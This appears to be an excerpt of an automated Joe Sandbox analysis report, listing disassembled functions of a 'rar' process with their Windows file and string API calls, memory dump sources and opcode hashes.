                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8A30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7CF8B4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7CF8A3119
                                                                                                                                                                                                                              • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8A3651
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                                                                              • String ID: %u.%03u
                                                                                                                                                                                                                              • API String ID: 2814246642-1114938957
                                                                                                                                                                                                                              • Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                                                                              • Instruction ID: 84f590869d2d8d76bf2e8293c336c20fe2094c9fd1b4f1814bc468caddc42aca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C73149616186C142EB14BF24E4113FAE2A0FB947B4FA01331EA7E477E1DE3DD5269320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                              • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                              • Instruction ID: 082deb28b52216f45a6b090b7b631acf15373f8b52943b23664b98c877fe0900
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D941B632B19A8686EB20AF15E8443F9B7A1FB98BA4F814031EE4D87794DF3CD411D764
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                              • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                              • Instruction ID: bc9a889153d240d91880308ccbad0e2d7ed15f478e85d8e36b19a00ed2fe6aba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96213E7B60868286E631EF15E0402AEB7A1FB84BB5F401636DE9D07B95CF3CE451DB20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr$swprintf
                                                                                                                                                                                                                              • String ID: %c:\
                                                                                                                                                                                                                              • API String ID: 1303626722-3142399695
                                                                                                                                                                                                                              • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                              • Instruction ID: fbd17461e882d0449f5aac42b0038337a763400dfb1663c4a648441ab5fe1d66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87118122A087C281EE247F1199024ADA7B0AF49BA4B988531CF6E437D6DF3CE4719330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                                                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                                                                                                                                              • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                              • Instruction ID: e98937a33e303053e8ba05cd2c9a800d7a2c143e4eaf24344df3d22740ea3aaa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58112932B15B818AFB049F21E4003E972E2EBD4B68F988035CA4D47259CF3ED4668770
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 904936192-0
                                                                                                                                                                                                                              • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                              • Instruction ID: 4097015bffc7aa9acdfca85c7d4882a26d14ca5117f730c20bceafd2af2ce839
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3451C362A19AC282EB14DF25D4503ECB3A1FBC4BA4F448232DE5D87794DF79D525D320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF7CF89F6FC,00000000,?,?,?,?,00007FF7CF8A097D), ref: 00007FF7CF8A38CD
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,00007FF7CF89F6FC,00000000,?,?,?,?,00007FF7CF8A097D,?,?,00000000), ref: 00007FF7CF8A391F
                                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00007FF7CF89F6FC,00000000,?,?,?,?,00007FF7CF8A097D,?,?,00000000), ref: 00007FF7CF8A399B
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00007FF7CF89F6FC,00000000,?,?,?,?,00007FF7CF8A097D,?,?,00000000), ref: 00007FF7CF8A39A6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2287278272-0
                                                                                                                                                                                                                              • Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                                                                                                                                                                                              • Instruction ID: 99ee0758ed3bff79a991a30f4893d00dfeeca3650526adca39264a289c89f826
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F041E422B0D6C142EA50AE11A4057FAE6E0FF82BB4FA44231EE9D077D4DF3ED5199720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                              • Instruction ID: a348cf54f079972ac11b43f1f807a065d08eb304af707853ce56255486bf0f55
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3418D62A0DAC385EB55AE21D0503FDA7D0EF40BA4F984533DB8D06A9DDF2CE4A59331
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4141327611-0
                                                                                                                                                                                                                              • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                              • Instruction ID: 3041ce6bd27b269b2552bf535b605170d9307ec3b0ee3680fbfeb8f3b640c77c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7341822AA0D7C246FB65AF5094403F9E6E0AF40BB0F944131DA5D8AAD9DF3CE561A730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF7CF8886CB,?,?,?,00007FF7CF88A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7CF882DF9), ref: 00007FF7CF89D09D
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF7CF8886CB,?,?,?,00007FF7CF88A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7CF882DF9), ref: 00007FF7CF89D0E5
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF7CF8886CB,?,?,?,00007FF7CF88A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7CF882DF9), ref: 00007FF7CF89D114
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF7CF8886CB,?,?,?,00007FF7CF88A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7CF882DF9), ref: 00007FF7CF89D15C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                              • Instruction ID: 0de4fcbea9c42b8851d669da0f2c0555f4509668faa732304209a0a04427e35f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4318532618B8586E7609F11F5547AAB7E0F789BB4F904325EAAC47BC8CF3CD1048B24
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7CF8E3CEF,?,?,00000000,00007FF7CF8E3CAA,?,?,00000000,00007FF7CF8E3FD9), ref: 00007FF7CF8E97A5
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7CF8E3CEF,?,?,00000000,00007FF7CF8E3CAA,?,?,00000000,00007FF7CF8E3FD9), ref: 00007FF7CF8E9807
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7CF8E3CEF,?,?,00000000,00007FF7CF8E3CAA,?,?,00000000,00007FF7CF8E3FD9), ref: 00007FF7CF8E9841
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7CF8E3CEF,?,?,00000000,00007FF7CF8E3CAA,?,?,00000000,00007FF7CF8E3FD9), ref: 00007FF7CF8E986B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
